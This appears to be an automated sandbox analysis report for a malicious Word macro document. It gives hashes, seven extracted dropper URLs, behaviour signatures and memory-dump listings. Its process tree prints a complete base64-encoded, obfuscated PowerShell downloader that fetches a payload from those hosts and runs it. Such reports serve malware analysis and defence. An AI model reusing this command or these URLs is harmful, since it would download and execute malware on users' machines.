Analysis

  • max time kernel
    120s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    20/11/2024, 22:14

General

  • Target

    ae247c339bb518965c9459e53f56ad2d49d8aa3d4741c3866267568ab44ff136.doc

  • Size

    147KB

  • MD5

    a8d59752b195f12e0b0c8a82cd192db3

  • SHA1

    a14c855c8f4545ca273f42e52ae2c599104178c6

  • SHA256

    ae247c339bb518965c9459e53f56ad2d49d8aa3d4741c3866267568ab44ff136

  • SHA512

    3c3291e0f683728f9726b1be94e320fcb6c6130e5cc41a0bbf99fdacf9fc7950fa32c1f68ccb567f1ba73da6f80b454aafa96535a88a7401cee01fbcc7a0dd8c

  • SSDEEP

    3072:H5BeY5kb0TUNAuBqVPlB11nBkwzdsIpzJ9gouDkRm9G:H5EYOb0TUquBqt7nBDZsIpzJtlRm9G

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://newmoontec.com/wp-content/uploads/8R0lFV/

exe.dropper

http://kiasoo.com/dl/7y7I1V/

exe.dropper

http://malkaragida.com/content/Una/

exe.dropper

http://xiaolechen.com/pollinodial/5lTy0/

exe.dropper

http://mallowsvirtualcreatives.com/wp-content/2pw1/

exe.dropper

https://rfcrfc.com/wp-admin/oZ/

exe.dropper

http://bbs.rfcrfc.com/api/V/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ae247c339bb518965c9459e53f56ad2d49d8aa3d4741c3866267568ab44ff136.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1304
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1312
    • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
      POwersheLL -ENCOD JABJAHQAagBwADQANgAwAD0AKAAnAEoAdQAnACsAKAAnADgAOABsACcAKwAnADAAaQAnACkAKQA7ACQARABuAHIAeQAxAHoAagA9ACQASwAxAHgAegByAGoAZgAgACsAIABbAGMAaABhAHIAXQAoADEAIAArACAAMQAgACsAIAAyADAAIAArACAAMQAwACAAKwAgADEAMAApACAAKwAgACQATQBhAHYAdABiADkAeQA7ACQAVQBvAG4AaABxADUANAA9ACgAJwBMACcAKwAoACcAZABfADQAJwArACcAdQAnACsAJwBqADMAJwApACkAOwBbAHMAeQBzAHQAZQBtAC4AaQBvAC4AZABpAHIAZQBjAHQAbwByAHkAXQA6ADoAIgBDAFIARQBhAGAAVABFAEQAaQByAGUAYABjAFQATwByAHkAIgAoACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAIAArACAAKAAoACcAVwAnACsAJwBmACcAKwAoACcANQAnACsAJwBPACcAKwAnAG4AZQBuAG4AcQBmAFcAZgA1ACcAKQArACcAVwBvACcAKwAnADAAJwArACcAZQAnACsAJwBrAGEAJwArACgAJwB1AFcAJwArACcAZgA1ACcAKQApAC4AIgByAGUAYABQAGAATABhAEMAZQAiACgAKABbAGMAaABBAHIAXQA4ADcAKwBbAGMAaABBAHIAXQAxADAAMgArAFsAYwBoAEEAcgBdADUAMwApACwAJwBcACcAKQApACkAOwAkAEQAXwB6AHUAbgA3AHcAPQAoACgAJwBKAGUAJwArACcAMAAzACcAKQArACcAawBwACcAKwAnAF8AJwApADsAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBDAFUAYABSAEkAYABUAFkAYABwAHIAbwBgAFQATwBDAE8ATAAiACAAPQAgACgAKAAnAFMAJwArACcAcwAnACsAJwBsADMALABUACcAKQArACgAJwBsAHMAJwArACcALABUAGwAJwApACsAJwBzADEAJwArACgAJwAxACwAVABsACcAKwAnAHMAMQAyACcAKQApADsAJABYADQAZAA5AHcAYgB0AD0AKAAoACcAWAA4AGoAJwArACcAbwBqAG0AJwApACsAJwB2ACcAKQA7ACQAUAB3AGQAcAA4AGEAYgAgAD0AIAAoACcARwAnACsAJwB6AG4AJwArACgAJwBiAGkAJwArACcAZQAnACkAKQA7ACQAWAAzAGsANABtADcAYQA9ACgAJwBaAGQAJwArACgAJwB1ADkAJwArACcAMgAnACkAKwAnAGYANgAnACkAOwAkAEMAcgBkAHkAcQB3AGgAPQAoACcAQgB0ACcAKwAnADIAJwArACgAJwB0AHcAYgAnACsAJwA5ACcAKQApADsAJABRAHkAbABpAGMAdgB3AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAoACcAeQAnACsAJwAxAFoAJwApACsAKAAnAE8AbgBlAG4AJwArACcAbgBxAGYAeQAnACkAKwAoACcAMQAnACsAJwBaAFcAbwAwACcAKwAnAGUAawAnACkAKwAnAGEAdQAnACsAKAAnAHkAMQAnACsAJwBaACcAKQApAC4AIgByAGAARQBwAEwAYABBAGMARQAiACgAKABbAEMASABBAHIAXQAxADIAMQArAFsAQwBIAEEAcgBdADQAOQArAFsAQwBIAEEAcgBdADkAMAApACwAWwBzAHQAUgBpAE4AZwBdAFsAQwBIAEEAcgBdADkAMgApACkAKwAkAFAAdwBkAHAAOABhAGIAKwAoACgAJwAuACcAKwAnAGUAeAAnACkAKwAnAGUAJwApADsAJABVAGMAaABmAGwAagBoAD0AKAAnAFgAJwArACgAJwByAGoAJwArACcAawAnACkAKwAoACcAMQAnACsAJwBwADUAJwApACkAOwAkAFYAcgBuAHcAMwB2AGkAPQAuACgAJwBuAGUAJwArACcAdwAtAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAG4AZQBUAC4AdwBlAEIAQwBMAEkAZQBOAHQAOwAkAFIAOABjADYAYgA4AGoAPQAoACgAJwBoAHQAdABwAHMAJwArACcAOgAvACcAKwAnAC8AbgBlACcAKwAnAHcAbQBvAG8AbgAnACsAJwB0AGUAYwAuACcAKwAnAGMAbwAnACsAJwBtAC8AdwBwAC0AYwBvAG4AdAAnACsAJwBlAG4AdAAvAHUAcABsAG8AYQBkACcAKwAnAHMAJwApACsAKAAnAC8AOAAnACsAJwBSADAAbABGACcAKQArACcAVgAnACsAKAAnAC8AKgAnACsAJwBoACcAKQArACgAJwB0AHQAcAA6AC8ALwBrACcAKwAnAGkAYQAnACsAJwBzACcAKwAnAG8AbwAuAGMAbwAnACkAKwAnAG0AJwArACgAJwAvAGQAbAAnACsAJwAvACcAKwAnADcAeQA3ACcAKQArACgAJwBJACcAKwAnADEAVgAvACoAaAAnACsAJwB0AHQAcAAnACsAJwA6AC8AJwApACsAKAAnAC8AbQBhACcAKwAnAGwAawAnACsAJwBhAHIAYQBnACcAKQArACgAJwBpACcAKwAnAGQAYQAnACkAKwAoACcALgBjAG8AJwArACcAbQAvAGMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBlAG4AJwArACcAdAAvAFUAbgBhACcAKwAnAC8AKgBoAHQAdABwACcAKwAnADoALwAvAHgAaQBhAG8AbAAnACkAKwAoACcAZQBjACcAKwAnAGgAZQBuACcAKQArACcALgBjACcAKwAoACcAbwBtACcAKwAnAC8AcAAnACkAKwAnAG8AJwArACgAJwBsAGwAaQAnACsAJwBuAG8AJwApACsAKAAnAGQAaQBhAGwALwAnACsAJwA1ACcAKQArACgAJwBsAFQAJwArACcAeQAnACsAJwAwAC8AKgBoAHQAdABwADoAJwArACcALwAvACcAKwAnAG0AYQBsACcAKwAnAGwAJwApACsAKAAnAG8AdwAnACsAJwBzAHYAaQAnACsAJwByAHQAdQBhAGwAJwArACcAYwAnACkAKwAoACcAcgBlAGEAdAAnACsAJwBpAHYAJwArACcAZQBzACcAKQArACgAJwAuAGMAJwArACcAbwBtACcAKQArACcALwB3ACcAKwAoACcAcAAtAGMAJwArACcAbwBuACcAKQArACcAdABlACcAKwAoACcAbgB0AC8AMgBwACcAKwAnAHcAMQAnACsAJwAvACoAaAAnACkAKwAoACcAdAB0AHAAcwA6AC8ALwByACcAKwAnAGYAJwArACcAYwByAGYAJwArACcAYwAuACcAKQArACgAJwBjAG8AJwArACcAbQAnACkAKwAnAC8AJwArACcAdwBwACcAKwAnAC0AJwArACcAYQAnACsAKAAnAGQAbQBpAG4ALwAnACsAJwBvACcAKwAnAFoAJwApACsAKAAnAC8AKgAnACsAJwBoACcAKQArACgAJwB0AHQAJwArACcAcAA6AC8AJwArACcALwAnACkAKwAoACcAYgAnACsAJwBiACcAKwAnAHMALgAnACsAJwByAGYAYwByAGYAYwAnACkAKwAoACcALgAnACsAJwBjAG8AbQAnACkAKwAnAC8AJwArACgAJwBhAHAAaQAnACsAJwAvAFYAJwApACsAJwAvACcAKQAuACIAUwBQAGAAbABJAFQAIgAoACQASwBvAGsAdgBlAHEAagAgACsAIAAkAEQAbgByAHkAMQB6AGoAIAArACAAJABPAHIAMwA0AGUAcwA2ACkAOwAkAEUAbQBmAHoAMAAxAF8APQAoACcARwAnACsAKAAnAG8AJwArACcAMwBfAG0AOQBkACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABCAG8AcwBhAGoAMwB4ACAAaQBuACAAJABSADgAYwA2AGIAOABqACkAewB0AHIAeQB7ACQAVgByAG4AdwAzAHYAaQAuACIAZABgAG8AVwBOAGwATwBgAEEARABmAGAASQBsAEUAIgAoACQAQgBvAHMAYQBqADMAeAAsACAAJABRAHkAbABpAGMAdgB3ACkAOwAkAFMAegBlAGkAMwBtAGMAPQAoACcAVQAnACsAKAAnADgAJwArACcAdgA1ACcAKQArACgAJwByACcAKwAnAHAAdgAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAnACsAJwAtAEkAdABlAG0AJwApACAAJABRAHkAbABpAGMAdgB3ACkALgAiAEwAZQBOAGAARwB0AEgAIgAgAC0AZwBlACAAMgA5ADEAOAAyACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAoACgAJwB3ACcAKwAnAGkAbgAzADIAXwAnACkAKwAoACcAUAAnACsAJwByAG8AJwApACsAKAAnAGMAJwArACcAZQBzAHMAJwApACkAKQAuACIAYwBgAFIAZQBhAFQAZQAiACgAJABRAHkAbABpAGMAdgB3ACkAOwAkAEkAZQBuAGsAZgBkAHoAPQAoACgAJwBLAG0AMgB6AGsAJwArACcAOQAnACkAKwAnAHgAJwApADsAYgByAGUAYQBrADsAJABEAGQAcQBuAHgAZwA1AD0AKAAnAFYAJwArACgAJwA3ACcAKwAnAGMAZQAnACkAKwAoACcAZwBuACcAKwAnADYAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEoAbgBhADQAMgBtAHUAPQAoACcATAAnACsAJwA1AG4AJwArACgAJwBhACcAKwAnAG0AeAB0ACcAKQApAA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2800

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1304-17-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/1304-16-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/1304-2-0x00000000715CD000-0x00000000715D8000-memory.dmp

      Filesize

      44KB

    • memory/1304-5-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/1304-6-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/1304-7-0x0000000005CE0000-0x0000000005DE0000-memory.dmp

      Filesize

      1024KB

    • memory/1304-10-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/1304-11-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/1304-9-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/1304-8-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/1304-12-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/1304-25-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/1304-22-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/1304-30-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/1304-29-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/1304-28-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/1304-21-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/1304-20-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/1304-19-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/1304-18-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/1304-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1304-15-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/1304-0-0x000000002FC51000-0x000000002FC52000-memory.dmp

      Filesize

      4KB

    • memory/1304-14-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/1304-13-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/1304-34-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/1304-33-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/1304-32-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/1304-37-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/1304-31-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/1304-39-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/1304-40-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/1304-38-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/1304-60-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/1304-57-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/1304-52-0x00000000715CD000-0x00000000715D8000-memory.dmp

      Filesize

      44KB

    • memory/1304-53-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/1304-54-0x0000000005CE0000-0x0000000005DE0000-memory.dmp

      Filesize

      1024KB

    • memory/1304-56-0x0000000000570000-0x0000000000670000-memory.dmp

      Filesize

      1024KB

    • memory/2800-46-0x000000001B720000-0x000000001BA02000-memory.dmp

      Filesize

      2.9MB

    • memory/2800-47-0x0000000001E70000-0x0000000001E78000-memory.dmp

      Filesize

      32KB